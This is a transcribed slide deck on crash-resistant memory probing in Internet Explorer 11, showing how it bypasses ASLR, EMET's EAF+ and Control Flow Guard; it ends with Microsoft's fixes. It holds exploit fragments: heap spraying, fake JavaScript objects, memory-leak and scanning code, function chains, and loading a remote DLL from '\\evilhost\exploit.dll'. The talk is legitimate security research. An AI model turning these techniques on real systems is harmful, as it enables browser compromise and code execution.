Bypassing Different Defense Schemes via Crash-Resistant Probing of Address Space
|
|
- Johnathan McDaniel
- 6 years ago
- Views:
Transcription
1 Bypassing Different Defense Schemes via Crash-Resistant Probing of Address Space Robert Gawlik Ruhr University Bochum Horst Görtz Institute for IT-Security Bochum, Germany
2 About me Playing with InfoSec since 2010 Currently in academia at Systems Security Horst Görtz Institute / Ruhr University Bochum Focusing on binary analysis / attacks / defenses / static and dynamic analysis Little time for bug hunting and exploiting Fun fact: Recently discovered favorite toy: DynamoRIO
3 Agenda Crash-Resistance Crash-Resistance in IE 32-bit (CVE ) Memory Scanning : Bypass ASLR Export Resolving : Bypass EMET's EAF+ Function Chaining : Bypass Control Flow Guard & EMET's UNC library path restriction Crash-Tolerant Function Dispatching : Fun! Mitigations/Fixes
4 Crash-Resistance
5 Crash-Resistance char* addr = 0; void crash(){ addr++; printf("reading %x", addr); char content = *(addr); printf("read done"); int main(){ MSG msg; SetTimer(0, 0, 1, crash); while(1){ GetMessage(&msg, NULL, 0, 0); DispatchMessage(&msg);
6 Crash-Resistance char* addr = 0; void crash(){ addr++; printf("reading %x", addr); char content = *(addr); printf("read done"); Set timer callback crash() int main(){ MSG msg; SetTimer(0, 0, 1, crash); while(1){ GetMessage(&msg, NULL, 0, 0); DispatchMessage(&msg);
7 Crash-Resistance char* addr = 0; void crash(){ addr++; printf("reading %x", addr); char content = *(addr); printf("read done"); Set timer callback crash() Dispatch crash() each ms int main(){ MSG msg; SetTimer(0, 0, 1, crash); while(1){ GetMessage(&msg, NULL, 0, 0); DispatchMessage(&msg);
8 Crash-Resistance char* addr = 0; void crash(){ addr++; printf("reading %x", addr); char content = *(addr); printf("read done"); Set timer callback crash() Dispatch crash() each ms crash() generates a fault on first execution int main(){ MSG msg; SetTimer(0, 0, 1, crash); while(1){ GetMessage(&msg, NULL, 0, 0); DispatchMessage(&msg);
9 Crash-Resistance char* addr = 0; void crash(){ addr++; printf("reading %x", addr); char content = *(addr); printf("read done"); Set timer callback crash() Dispatch crash() each ms crash() generates a fault on first execution int main(){ MSG msg; SetTimer(0, 0, 1, crash); while(1){ GetMessage(&msg, NULL, 0, 0); DispatchMessage(&msg); Program should terminate abnormally
10 Crash-Resistance
11 Crash-Resistance char* addr = 0; void crash(){ addr++; printf("reading %x", addr); char content = *(addr); printf("read done"); Set timer callback crash() Dispatch crash() each ms crash() generates a fault on first execution int main(){ MSG msg; SetTimer(0, 0, 1, crash); while(1){ GetMessage(&msg, NULL, 0, 0); DispatchMessage(&msg); Instead: Program runs endlessly
12 Crash-Resistance char* addr = 0; void crash(){ addr++; printf("reading %x", addr); char content = *(addr); printf("read done"); Set timer callback crash() Dispatch crash() each ms crash() generates a fault on first execution int main(){ MSG msg; SetTimer(0, 0, 1, crash); while(1){ GetMessage(&msg, NULL, 0, 0); DispatchMessage(&msg);
13 Crash-Resistance 0:000:x86> g (370.e4): Access violation - code c (first chance) crash_resistance!crash+0x2d: 009b104d 8a02 mov al,byte ptr [edx] ds:002b: =?? 0:000:x86> gn (370.e4): Access violation - code c (first chance) crash_resistance!crash+0x2d: 009b104d 8a02 mov al,byte ptr [edx] ds:002b: =?? 0:000:x86>!exchain [...] 0057f800: USER32!_except_handler4+0 CRT scope 0, filter: USER32!DispatchMessageWorker func: USER32!DispatchMessageWorker+36895
14 Crash-Resistance 0:000:x86> g (370.e4): Access violation - code c (first chance) crash_resistance!crash+0x2d: 009b104d 8a02 mov al,byte ptr [edx] ds:002b: =?? 0:000:x86> gn (370.e4): Access violation - code c (first chance) crash_resistance!crash+0x2d: 009b104d 8a02 mov al,byte ptr [edx] ds:002b: =?? 0:000:x86>!exchain pass exception unhandled [...] 0057f800: USER32!_except_handler4+0 CRT scope 0, filter: USER32!DispatchMessageWorker func: USER32!DispatchMessageWorker+36895
15 Crash-Resistance char* addr = 0; void crash(){ addr++; printf("reading %x", addr); char content = *(addr); printf("read done"); Behind the Scenes (Simplified) DispatchMessage: try { crash() except(filter) { access violation filter returns 1 int main(){ execute handler MSG msg; SetTimer(0, 0, 1, crash); continue execution while(1){ GetMessage(&msg, NULL, 0, 0); return DispatchMessage(&msg);
16 Crash-Resistance char* addr = 0; void crash(){ addr++; printf("reading %x", addr); char content = *(addr); printf("read done"); Behind the Scenes (Simplified) int main(){ MSG msg; SetTimer(0, 0, 1, crash); while(1){ GetMessage(&msg, NULL, 0, 0); return DispatchMessage(&msg); DispatchMessage: try { crash() except(filter) {
17 Crash-Resistance char* addr = 0; Behind the Scenes (Simplified) void crash(){ addr++; printf("reading %x", addr); char content = *(addr); printf("read done"); int main(){ MSG msg; SetTimer(0, 0, 1, crash); while(1){ GetMessage(&msg, NULL, 0, 0); DispatchMessage(&msg); If a fault is generated, execution is transferred to the end of the loop Program continues running despite producing faults
18 Crash-Resistance char* addr = 0; Behind the Scenes (Simplified) void crash(){ addr++; printf("reading %x", addr); char content = *(addr); printf("read done"); int main(){ MSG msg; SetTimer(0, 0, 1, crash); while(1){ GetMessage(&msg, NULL, 0, 0); DispatchMessage(&msg); If a fault is generated, execution is transferred to the end of the loop Program continues running despite producing faults
19 Crash-Resistance DEMO 1
20 Crash-Resistance Similar issues: - Why it's not crashing? [1] - ANI Vulnerability (CVE ) [2] - Escaping VMware Workstation through COM1 (JPEG2000 parsing) [3] - The Art of Leaks (exploit reliability) [4]
21 Crash-Resistance in Internet Explorer 11
22 Crash-Resistance in IE 11 JS callback() set with setinterval() or settimeout() in web worker is crash-resistant: Start worker Launch timed callback() with setinterval() callback() function may produce access violations without forcing IE into termination (a): if an AV is triggered in callback(), then callback() stops running and is executed anew (b): if callback() produces no fault, it is executed completely and then started anew usable as side channel
23 Crashless Memory Scanning in Internet Explorer 11
24 Memory Scanning The Plan: Spray the heap Use vulnerabilty to change a byte Create a type confusion and craft fake JS objects Utilize fake objects in web worker with setinterval() to scan memory in a crash-resistant way Discover Thread Environment Block (TEB) Discover DLL Base Addresses Don't control EIP yet instead: use only JS bypass ASLR
25 Memory Scanning Spray the heap Alternate between Object Arrays and Integer Arrays Object Arrays become aligned to 0xYYYY0000 Integer Arrays become aligned to +f000 +f400 +f800 +fc00 Object Array: ObjArr[0] = new String() // saved as reference; bit 0 never set ObjArr[1] = 4 // integer saved as 9 = 4 << 1 1 Integer Array: IntArr[0] = 4 // saved as 4
26 Memory Scanning Spray the heap ObjArr[0] = 0x808f880 // saved as 0x808f880 << 1 1 = 0x1011f101 ObjArr[1] = new Uint32Array() // saved as reference 0x100ff1b0 0:036> dd L0x0c eff fc 00003bf f ff1b :036> dds 100ff1b0 L1 100ff1b c jscript9!js::typedarray<unsigned int,0>::`vftable'
27 Memory Scanning Spray the heap ObjArr[0] = 0x808f880 // saved as 0x808f880 << 1 1 = 0x1011f101 ObjArr[1] = new Uint32Array() // saved as reference 0x100ff1b0 0:036> dd L0x0c eff fc 00003bf f ff1b header space 0:036> dds 100ff1b0 L1 100ff1b c jscript9!js::typedarray<unsigned int,0>::`vftable'
28 Memory Scanning Spray the heap ObjArr[0] = 0x808f880 // saved as 0x808f880 << 1 1 = 0x1011f101 ObjArr[1] = new Uint32Array() // saved as reference 0x100ff1b0 0:036> dd L0x0c eff fc 00003bf f ff1b first element 0:036> dds 100ff1b0 L1 100ff1b c jscript9!js::typedarray<unsigned int,0>::`vftable'
29 Memory Scanning Spray the heap ObjArr[0] = 0x808f880 // saved as 0x808f880 << 1 1 = 0x1011f101 ObjArr[1] = new Uint32Array() // saved as reference 0x100ff1b0 0:036> dd L0x0c eff fc 00003bf f ff1b :036> dds 100ff1b0 L1 100ff1b c jscript9!js::typedarray<unsigned int,0>::`vftable' IntArr[0] = IntArr[(0x100-0x10 + 4) / 4] = 0x1011f010 0:036> ddp 1011f100 L2 1011f f f
30 Memory Scanning Spray the heap ObjArr[0] = 0x808f880 // saved as 0x808f880 << 1 1 = 0x1011f101 ObjArr[1] = new Uint32Array() // saved as reference 0x100ff1b0 Why this odd index? (0x100 0x10 + 4) / 4 0:036> dd L0x0c eff fc 00003bf f ff1b :036> dds 100ff1b0 L1 100ff1b c jscript9!js::typedarray<unsigned int,0>::`vftable' IntArr[0] = IntArr[(0x100-0x10 + 4) / 4] = 0x1011f010 0:036> ddp 1011f100 L2 1011f f f IntArr is aligned to 0x1011f000 0x10: occupied header space + 0x100: offset to 0x1011f x4: element offset / 0x4: element size We can expect the element to reside at 0x1011f104
31 Memory Scanning Spray the heap ObjArr[0] = 0x808f880 // saved as 0x808f880 << 1 1 = 0x1011f101 ObjArr[1] = new Uint32Array() // saved as reference 0x100ff1b0 0:036> dd L0x0c eff fc 00003bf f ff1b :036> dds 100ff1b0 L1 100ff1b c jscript9!js::typedarray<unsigned IntArr is aligned to 0x1011f000 int,0>::`vftable' : first element resides at 0x1011f010 IntArr[0] = x10 bytes are taken as IntArr[(0x100-0x10 + 4) / 4] = header 0x1011f010 space 0:036> ddp 1011f100 L2 1011f f f
32 Memory Scanning Spray the heap ObjArr[0] = 0x808f880 // saved as 0x808f880 << 1 1 = 0x1011f101 ObjArr[1] = new Uint32Array() // saved as reference 0x100ff1b0 0:036> dd L0x0c eff fc Almost! 00003bf f ff1b :036> dds 100ff1b0 L1 100ff1b c jscript9!js::typedarray<unsigned int,0>::`vftable' IE will interpret ObjArr[0] as object IntArr[0] = reference and not as number. IntArr[(0x100-0x10) / 4] = 0x1011f010 Additionally, we control IntArr: We could set all fields of the object referenced by ObjArr[0] 0:036> ddp 1011f100 L2 1011f f f We need to change 01 to 00:
33 Memory Scanning Trigger a vulnerability to change a byte Use a rewriting Use-After-Free [5], e.g., CVE (IE10): OR inc [eax+0x10] eax is attacker controlled possible to change an arbitrary byte and continue execution in JavaScript Single NULL byte write to attacker chosen address create a type confusion (0x1011f101 becomes 1011f100) => ObjArr[0] is interpreted as object
34 Memory Scanning Creating fake JS Objects jscript9!js::literalstring looks like : typedef struct LiteralString_{ /*0x0*/ VOID* vtable_ptr; /*0x4*/ VOID* type_ptr; // points to type object /*0x8*/ UINT len; /*0xc*/ WCHAR* buf; // string content LiteralString; offset = (0x100 0x10) / 4 IntArr[0] = // 0x1011f010 IntArr[offset] = 0x // bogus vtable IntArr[offset + 0x4] = 0x1011f010 // points to type IntArr[offset + 0x8] = 0x2 // length IntArr[offset + 0xc] = 0x // address of content
35 Memory Scanning Creating fake JS Objects fakestring = ObjArr[0] // get object element located at 0x1011f100 leak = escape(fakestring) // leak 0x4 bytes from 0x we have set 0x as vtable ptr, but escape() still works fakestring.substring() does not work vtable lookup AV We can now leak already all the things! function leak(addr){ intarr[offset + 0xc] = addr return to_dword(unescape(escape(objarr[0])))
36 Memory Scanning Creating fake JS Objects Example: leak vtable ptr and type ptr to sanitize fakestring ObjArr[1] = bla // create LiteralString 0x ) str_addr = leak(0x ) str_vtable_ptr = leak(str_addr) str_type_ptr = leak(str_addr + 4) IntArr[offset] = str_vtable_ptr // give fakestring a real vptr! IntArr[offset + 4] = str_type_ptr // real type ptr! fakestring.substring() should work now :) We can build arbitrary JS objects if we know their structure We don't have a write-what-where interface yet Build your own Uint32Array() to RW complete memory
37 Memory Scanning Creating fake JS Objects Exercise: Build your own Uint32Array() Inaccurate hint: typedef struct Uint32Array_{ /*0x00*/ VOID* vtable_ptr; /*0x04*/ VOID* type_ptr; /*0x08*/ INT NULL; /*0x0c*/ INT NULL; /*0x10*/ VOID* arraybufferobjectptr; // can be unset /*0x14*/ INT elemsize; // 4 /*0x18*/ INT arraybufferoffset; /*0x1c*/ INT nrelements; // 0x7fffffff/4 /*0x20*/ VOID* bufferptr; // set to 0 /*0x24*/ INT NULL; /*0x28*/ INT NULL; /*0x2c*/ INT NULL; Uint32Array;
38 Memory Scanning Crash-Resistant Scanning Where are we now? We have fake String and Typed Array objects usable to read and write the address space arbitrary information leak arbitrary memory write Use fake objects for crash-resistant scanning
39 Memory Scanning Crash-Resistant Scanning Discover a Thread Environment Block 0:020>!teb TEB at 7f :020> dt ntdll!_teb 7f /b +0x000 NtTib : _NT_TIB +0x000 ExceptionList : 0x03e0f8cc +0x004 StackBase : 0x03e x008 StackLimit : 0x03e0c x018 Self : 0x7f :020> dt ntdll!_teb 7f x030 ProcessEnvironmentBlock : 0x7f15f000 _PEB TEB == [TEB + 0x18] && [TEB + 4] > [TEB] > [TEB + 8]?
40 Memory Scanning Crash-Resistant Scanning Discover a Thread Environment Block 0:020>!teb TEB at 7f :020> dt ntdll!_teb 7f /b +0x000 NtTib : _NT_TIB +0x000 ExceptionList : 0x03e0f8cc +0x004 StackBase : 0x03e x008 StackLimit : 0x03e0c x018 Self : 0x7f Heuristic yields TEB if we read at the right place Afterwards, PEB can be resolved 0:020> dt ntdll!_teb 7f x030 ProcessEnvironmentBlock : 0x7f15f000 _PEB Normally we cannot leak the TEB as no references exist to it TEB == [TEB + 0x18] && [TEB + 4] > [TEB] > [TEB + 8]?
41 Memory Scanning Crash-Resistant Scanning Discover a Thread Environment Block /* worker. js */ self.onmessage = function(){ addr = 0x id = setinterval(scan, 0) function scan(){ addr = addr 0x1000 maybe_teb = leak(addr) if (isteb(maybe_teb)){ clearinterval(id) /* leak stuff */
42 Memory Scanning Crash-Resistant Scanning Discover a Thread Environment Block /* worker. js */ self.onmessage = function(){ addr = 0x id = setinterval(scan, 0) function scan(){ addr = addr 0x1000 maybe_teb = leak(addr) if (isteb(maybe_teb)){ clearinterval(id) /* leak stuff */ scan() runs crash-resistant
43 Memory Scanning Crash-Resistant Scanning Discover a Thread Environment Block /* worker. js */ self.onmessage = function(){ addr = 0x id = setinterval(scan, 0) function scan(){ addr = addr 0x1000 maybe_teb = leak(addr) if (isteb(maybe_teb)){ clearinterval(id) /* leak stuff */ scan() runs crash-resistant set address to probe
44 Memory Scanning Crash-Resistant Scanning Discover a Thread Environment Block /* worker. js */ self.onmessage = function(){ addr = 0x id = setinterval(scan, 0) function scan(){ addr = addr 0x1000 maybe_teb = leak(addr) if (isteb(maybe_teb)){ clearinterval(id) /* leak stuff */ scan() runs crash-resistant set address to probe leak() creates implicit flow: if addr!= mapped: return
45 Memory Scanning Crash-Resistant Scanning Discover a Thread Environment Block /* worker. js */ self.onmessage = function(){ addr = 0x id = setinterval(scan, 0) function scan(){ addr = addr 0x1000 maybe_teb = leak(addr) if (isteb(maybe_teb)){ clearinterval(id) /* leak stuff */ scan() runs crash-resistant set address to probe leak() creates implicit flow: if addr!= mapped: return use heuristic to discover TEB and leak PEB + LdrData
46 Memory Scanning Crash-Resistant Scanning Discover a Thread-Environment Block
47 Memory Scanning Crash-Resistant Scanning Discover module base addresses directly /* worker. js */ self.onmessage = function(){ addr = 0x id = setinterval(scan, 0) function scan(){ addr = addr 0x10000 maybe_pe = leak(addr) if (ispe(maybe_pe)){ clearinterval(id) /* leak stuff */
48 Memory Scanning Crash-Resistant Scanning Discover module base addresses directly /* worker. js */ self.onmessage = function(){ addr = 0x id = setinterval(scan, 0) function scan(){ addr = addr 0x10000 maybe_pe = leak(addr) if (ispe(maybe_pe)){ clearinterval(id) /* leak stuff */ scan() runs crash-resistant
49 Memory Scanning Crash-Resistant Scanning Discover module base addresses directly /* worker. js */ self.onmessage = function(){ addr = 0x id = setinterval(scan, 0) function scan(){ addr = addr 0x10000 maybe_pe = leak(addr) if (ispe(maybe_pe)){ clearinterval(id) /* leak stuff */ scan() runs crash-resistant address to probe (64K alignment)
50 Memory Scanning Crash-Resistant Scanning Discover module base addresses directly /* worker. js */ self.onmessage = function(){ addr = 0x id = setinterval(scan, 0) function scan(){ addr = addr 0x10000 maybe_pe = leak(addr) if (ispe(maybe_pe)){ clearinterval(id) /* leak stuff */ scan() runs crash-resistant address to probe (64K alignment) get leak or return
51 Memory Scanning Crash-Resistant Scanning Discover module base addresses directly /* worker. js */ self.onmessage = function(){ addr = 0x id = setinterval(scan, 0) function scan(){ addr = addr 0x10000 maybe_pe = leak(addr) if (ispe(maybe_pe)){ clearinterval(id) /* leak stuff */ scan() runs crash-resistant address to probe (64K alignment) get leak or return if leak() succeeds check for MZ and PE header (ispe())
52 Memory Scanning Crash-Resistant Scanning Discover module base addresses directly /* worker. js */ self.onmessage = function(){ addr = 0x id = setinterval(scan, 0) function scan(){ addr = addr 0x10000 maybe_pe = leak(addr) if (ispe(maybe_pe)){ clearinterval(id) /* leak stuff */ scan() runs crash-resistant address to probe (64K alignment) get leak or return if leak() succeeds check for MZ and PE header (ispe()) leak more memory: name of module size of module
53 Memory Scanning DEMO 2
54 Resolve Exports under EMET
55 Export Resolving Resolve Exports under EMET 5.2 EAF and EAF+
56 Export Resolving Resolve Exports under EMET EAF and EAF+ EAF: Forbit accesses to Export Address Table based on calling code (shellcode) EAF+: Block read accesses to Export Address Table originating from certain modules EMET's max. security setting for IE (blacklist): mshtml.dll; flash*.ocx; jscript*.dll; vbscript.dll; vgx.dll can we abuse reads originating from non-blacklisted modules using only JS (no control-flow hijacking)?
57 Export Resolving Resolve Exports under EMET EAF and EAF+ Yes we can! Let fakestring point to module base and set module size escape(fakestring) copies the DLL for you! escape used msvcrt!fastcopy_i (msvcrt.dll is not blacklisted) - Worked with large strings but in recent tests it stopped working (fixed?)
58 Export Resolving Resolve Exports under EMET EAF and EAF+ Yes we can! Let fakestring point to module base and set module size escape(fakestring) copies the DLL for you! escape used msvcrt!fastcopy_i (msvcrt.dll is not blacklisted)?! - Worked with large strings but in recent tests it stopped working!!!!!! (fixed?, drunk?)
59 Export Resolving Resolve Exports under EMET EAF and EAF+ Yes we can! Let fakestring point to module base and set module size There is something better: escape(fakestring) copies the DLL for you! Use the Blob! escape used msvcrt!fastcopy_i (msvcrt.dll is not blacklisted) - worked with large strings but in recent tests it stopped working!!!!!! (fixed?, drunk?)
60 Export Resolving Resolve Exports under EMET EAF and EAF+ Yes we can! Let fakestring point to module base and set module size Create a Blob of the fakestring object blob = new Blob([fakeString], {type:"application/octet-stream") url = URL.createObjectURL(blob) 0:024> kp n # ChildEBP RetAddr bed ntdll!countunicodetoutf8+0x bed38 774ac7fb ntdll!rtlunicodetoutf8n+0xf bed a KERNELBASE!WideCharToMultiByte+0x bedd f MSHTML!CBlobBuilder::AppendData+0x bee28 72f415e1 MSHTML!CBlobBuilder::ConstructBlob+0x2c bee50 714e0fb6 MSHTML!CFastDOM::CBlob::DefaultEntryPoint+0x61
61 Export Resolving Resolve Exports under EMET EAF and EAF+ Yes we can! Let fakestring point to module base and set module size Create a Blob of the fakestring object blob = new Blob([fakeString], {type:"application/octet-stream") url = URL.createObjectURL(blob) 0:024> kp n # ChildEBP RetAddr bed ntdll!countunicodetoutf8+0x bed38 774ac7fb ntdll!rtlunicodetoutf8n+0xf4 Not blacklisted bed a KERNELBASE!WideCharToMultiByte+0x269 by EAF bedd f MSHTML!CBlobBuilder::AppendData+0x bee28 72f415e1 MSHTML!CBlobBuilder::ConstructBlob+0x2c bee50 714e0fb6 MSHTML!CFastDOM::CBlob::DefaultEntryPoint+0x61
62 Export Resolving Resolve Exports under EMET EAF and EAF+ Yes we can! Let fakestring point to module base and set module size Create a Blob of the fakestring object Use XMLHttpRequest to retrieve a string copy of the module Resolve exports within the string copy: PE = to_dword(dll.substring(0x3c/2, 0x3c/2 + 2)) p_exp = PE + 0x18 + 0x60 ExportDir = to_dword(dll.substring(p_exp/2, p_exp/2 + 2)...
63 Export Resolving DEMO 3
64 Function Chaining
65 Function Chaining Staying under the radar of Control Flow Guard (CFG) CFG protects indirect calls Exported functions are allowed, but not all Control Flow Hijacking: trigger virtual function call with a method of fakestring: IntArr[offset] = fakevtable fakestring = ObjArr[0] fakestring.whatever() // bogus vtable ptr push fakestring mov eax, [fakestring] call [eax + x] // Arg1: controlled content // get vtable ptr // controlled target
66 Function Chaining Staying under the radar of Control Flow Guard (CFG) Idea: (1) Collect export functions which have indirect calls (2) Check if indirect call target is a field of first argument (3) Check if parameters for indirect call target are influenced by arguments Fields of controlled object (first argument) get propagated to parameters before indirect call chain functions Last function in chain is the function we want to perform our operation
67 Function Chaining Staying under the radar of Control Flow Guard (CFG) Example function chain: push fakestring // controlled content mov eax, [fakestring] // get vtable ptr call [eax + 0x20] // fake virtual function (func1) func1(fakestring):... push [fakestring + 0x10] push [fakestring + 0x04] push fakestring call [fakestring + 0x08] // = arg3 // = arg2 // = arg1 // = func2 func2(arg1, arg2, arg3):... push arg2 // = [fakestring + 0x04] = CONTEXT* push arg3 // = [fakestring + 0x10] = HANDLE call [arg1 + 0x0c] // = [fakestring + 0x0c] = SetThreadContext
68 Function Chaining Staying under the radar of Control Flow Guard (CFG) Use of networkx [6] and miasm2 [7] to collect suitable exports: In RtlInsertElementGenericTableFullAvl : EBX = Arg1 (fakestring) ESI = [EBX + 0x2c] EIP = ESI
69 Function Chaining Staying under the radar of Control Flow Guard (CFG) Use of networkx [6] and miasm2 [7] to collect suitable exports: In RtlInsertElementGenericTableFullAvl : EBX = Arg1 (fakestring) ESI = [EBX + 0x2c] EIP = ESI EIP = [Arg1 + 0x2c]
70 Function Chaining Staying under the radar of Control Flow Guard (CFG) Use of networkx [6] and miasm2 [7] to collect suitable exports: In RtlInsertElementGenericTableFullAvl : EBX = Arg1 (fakestring) ESI = [EBX + 0x2c] EIP = ESI EIP = [Arg1 + 0x2c] EBX = Arg1 Param1 = EBX
71 Function Chaining Staying under the radar of Control Flow Guard (CFG) Use of networkx [6] and miasm2 [7] to collect suitable exports: In RtlInsertElementGenericTableFullAvl : EBX = Arg1 (fakestring) ESI = [EBX + 0x2c] EIP = ESI EIP = [Arg1 + 0x2c] EBX = Arg1 Param1 = EBX Param1 = Arg1
72 Function Chaining Staying under the radar of Control Flow Guard (CFG) Use of networkx [6] and miasm2 [7] to collect suitable exports: In RtlInsertElementGenericTableFullAvl : EBX = Arg1 (fakestring) ESI = [EBX + 0x2c] EIP = ESI EIP = [Arg1 + 0x2c] EBX = Arg1 Param1 = EBX Param1 = Arg1 EAX = Arg3 ECX = EAX + 0x10 Param2 = ECX
73 Function Chaining Staying under the radar of Control Flow Guard (CFG) Use of networkx [6] and miasm2 [7] to collect suitable exports: In RtlInsertElementGenericTableFullAvl : EBX = Arg1 (fakestring) ESI = [EBX + 0x2c] EIP = ESI EIP = [Arg1 + 0x2c] EBX = Arg1 Param1 = EBX Param1 = Arg1 EAX = Arg3 ECX = EAX + 0x10 Param2 = ECX Param2 = Arg3 + 0x10
74 Function Chaining Staying under the radar of Control Flow Guard (CFG) Use of networkx [6] and miasm2 [7] to collect suitable exports: In RtlInsertElementGenericTableFullAvl : Simple Propagation Summary: EIP = [Arg1 + 0x2c] Param1 = Arg1 Param2 = Arg3 + 0x10
75 Function Chaining Staying under the radar of Control Flow Guard (CFG) Load arbitrary remote DLLs under EMET: Chain of five NTDLL functions (Win 8.1 only): RtlLookupElementGenericTableFullAvl (1) RtlInsertElementGenericTableFullAvl (2) RtlLookupElementGenericTableFull (3) RtlTraceDatabaseFind (4) LdrInitShimEngineDynamic (5) Execute callchain : Two controlled parameters LdrInitShimEngineDynamic([fakeStr + 0x8] + 0x20, [fakestr] + 0x18) Param1 has to be within a module's bounds Param2: pointer to remote DLL: \\evilhost\exploit.dll
76 Crash-Resistant Export Dispatching
77 Crash-Resistant Export Dispatching Combining Function Chaining and Crash-Resistance Function chain allows dispatching exports with max. two parameters MoveFileA(STR, STR) NtGetContextThread(HANDLE, CONTEXT)... After execution of last function in chain an AV is thrown Catched when AV happens within callback() of setinterval()! Possibility to subsequently execute several function chains: MoveFileA() + LoadLibrary() two chains NtGetContextThread() + NtContinue() two chains WinExec() + WinExec() + WinExec() three chains :)
78 Crash-Resistant Export Dispatching DEMO 4
79 Crash-Resistant Export Dispatching Executing arbitrary exports without Shellcode, ROP or JIT (1) Get ESP with NtGetContextThread as last function in chain (2) Prepare fake object with CONTEXT for NtContinue: set EIP to wanted exported function (e.g., system call) set ESP to free stack space (3) Prepare free stack space: write parameters for exported function set return address for exported function to NULL (4) Use virtual function call to launch NtContinue on indirect call site in crash-resistant mode (5) Read return data of system call and proceed to step (2)
80 Crash-Resistant Export Dispatching Executing arbitrary exports without Shellcode, ROP or JIT (1) Get ESP with NtGetContextThread as last function in chain (2) Prepare fake object with CONTEXT for NtContinue: set EIP to wanted TNX exported to Yang function Yu for (e.g., system call) set ESP to free the stack NtContinue space Trick [5]! (3) Prepare free stack space: write parameters for exported function set return address for exported function to NULL (4) Use virtual function call to launch NtContinue on indirect call site in crash-resistant mode (5) Read return data of system call and proceed to step (2)
81 Mitigations
82 Mitigations Fixes and Feedback by Microsoft user32 exception handing hardening feature addresses Internet Explorer 7-11 (MS15-124) [8] Crash-Resistant issue fixed in MS Edge (MS15-125) [9] Control Flow Guard is becoming more fine-grained with each Windows version: NtContinue is no valid indirect call target in Windows10 RTM Code Integrity in MS Edge: - block loading of arbitrary libraries - block child process creation (Windows 10 Insider Preview)
83 Q & A robert.gawlik@rub.de
84 References [1] [2] [3] [4] Art of Leaks - read version - Yoyo.pdf [5] [6] [7] [8] [9]
Undermining Information Hiding (And What to do About it)
Undermining Information Hiding (And What to do About it) Enes Göktaş, Robert Gawlik, Benjamin Kollenda, Elias Athanasopoulos, Georgios Portokalidis, Cristiano Giuffrida, Herbert Bos Overview Mitigating
More informationReturn-orientated Programming
Return-orientated Programming or The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86) Hovav Shacham, CCS '07 Return-Oriented oriented Programming programming
More informationBack To The Epilogue
Back To The Epilogue How to Evade Windows' Control Flow Guard with Less than 16 Bytes Andrea Biondo * Prof. Mauro Conti Daniele Lain * SPRITZ Group University of Padua, IT GOALS - Return to function epilogue
More informationBiography. Background
From Over ow to Shell An Introduction to low-level exploitation Carl Svensson @ KTH, January 2019 1 / 28 Biography MSc in Computer Science, KTH Head of Security, KRY/LIVI CTF: HackingForSoju E-mail: calle.svensson@zeta-two.com
More informationFrom Over ow to Shell
From Over ow to Shell An Introduction to low-level exploitation Carl Svensson @ Google, December 2018 1 / 25 Biography MSc in Computer Science, KTH Head of Security, KRY/LIVI CTF: HackingForSoju E-mail:
More informationPatching Exploits with Duct Tape: Bypassing Mitigations and Backward Steps
SESSION ID: EXP-R01 Patching Exploits with Duct Tape: Bypassing Mitigations and Backward Steps James Lyne Global Head of Security Research Sophos / SANS Institute @jameslyne Stephen Sims Security Researcher
More informationCountermeasures in Modern Operating Systems. Yves Younan, Vulnerability Research Team (VRT)
Countermeasures in Modern Operating Systems Yves Younan, Vulnerability Research Team (VRT) Introduction Programs in C/C++: memory error vulnerabilities Countermeasures (mitigations): make exploitation
More informationPRESENTED BY: SANTOSH SANGUMANI & SHARAN NARANG
PRESENTED BY: SANTOSH SANGUMANI & SHARAN NARANG Table of contents Introduction Binary Disassembly Return Address Defense Prototype Implementation Experimental Results Conclusion Buffer Over2low Attacks
More informationDefeat Exploit Mitigation Heap Attacks. compass-security.com 1
Defeat Exploit Mitigation Heap Attacks compass-security.com 1 ASCII Armor Arbitrary Write Overflow Local Vars Exploit Mitigations Stack Canary ASLR PIE Heap Overflows Brute Force Partial RIP Overwrite
More informationLecture 08 Control-flow Hijacking Defenses
Lecture 08 Control-flow Hijacking Defenses Stephen Checkoway University of Illinois at Chicago CS 487 Fall 2017 Slides adapted from Miller, Bailey, and Brumley Control Flow Hijack: Always control + computation
More informationCS 161 Computer Security
Paxson Spring 2011 CS 161 Computer Security Discussion 1 January 26, 2011 Question 1 Buffer Overflow Mitigations Buffer overflow mitigations generally fall into two categories: (i) eliminating the cause
More informationOn Compilers, Memory Errors and Control-Flow Integrity
On Compilers, Memory Errors and Control-Flow Integrity Advanced Compiler Design SS 2015 Antonio Hüseyin Barresi Zürich, 27.5.2015 CVE-2012-0158 is a buffer overflow Vulnerability in the ListView / TreeView
More informationMemory corruption vulnerability exposure can be mitigated through memory hardening practices
Memory corruption vulnerability exposure can be mitigated through memory hardening practices OS vendors have a unique opportunity to fight memory corruption vulnerabilities through hardening the memory
More informationCanSecWest 2011, March Understanding and Exploiting Flash ActionScript Vulnerabilities -- Haifei Li, Sr. Security Researcher
CanSecWest 2011, March 2011 Understanding and Exploiting Flash ActionScript Vulnerabilities -- Haifei Li, Sr. Security Researcher hfli@fortinet.com Why started this research Recent years we have seen an
More informationCS 161 Computer Security
Paxson Spring 2017 CS 161 Computer Security Discussion 2 Question 1 Software Vulnerabilities (15 min) For the following code, assume an attacker can control the value of basket passed into eval basket.
More informationRUHR-UNIVERSITÄT BOCHUM. Towards Automated Integrity Protection of C++ Virtual Function Tables in Binary Programs
RUHR-UNIVERSITÄT BOCHUM Horst Görtz Institute for IT Security Technical Report TR-HGI-2014-004 Towards Automated Integrity Protection of C++ Virtual Function Tables in Binary Programs Robert Gawlik and
More information2
1 2 3 4 6 13 14 15 27 0xffffffff rw- Stack attacker code & data rw- Heap attacker code & data r-x Code 0x00000000 28 %ebp %esp return address buf[1024] rw- r-x Code address gadget4 address gadget3 dummy
More informationHunting Zero Days in Crash Dumps. hotwing
Hunting Zero Days in Crash Dumps hotwing /usr/bin/whoami D923AE0C-190D-4EDF-B07A-76AC571FBFD4 SCSKEX.cab filever /v SCSKEX.ocx --a-- W32i DLL ENU 4.0.31.7 shp 858,832 scskex.ocx Language 0x0409 (English
More informationSA31675 / CVE
Generated by Secunia 10 September, 2008 5 pages Table of Contents Introduction 2 Technical Details 2 Exploitation 4 Characteristics 4 Tested Versions 4 Fixed Versions 5 References 5 Generated by Secunia
More informationThis time. Defenses and other memory safety vulnerabilities. Everything you ve always wanted to know about gdb but were too afraid to ask
This time We will continue Buffer overflows By looking at Overflow Defenses and other memory safety vulnerabilities Everything you ve always wanted to know about gdb but were too afraid to ask Overflow
More informationFFRI,Inc. Monthly Research Understanding bypassing ASLR by a pointer at a fixed address. Ver
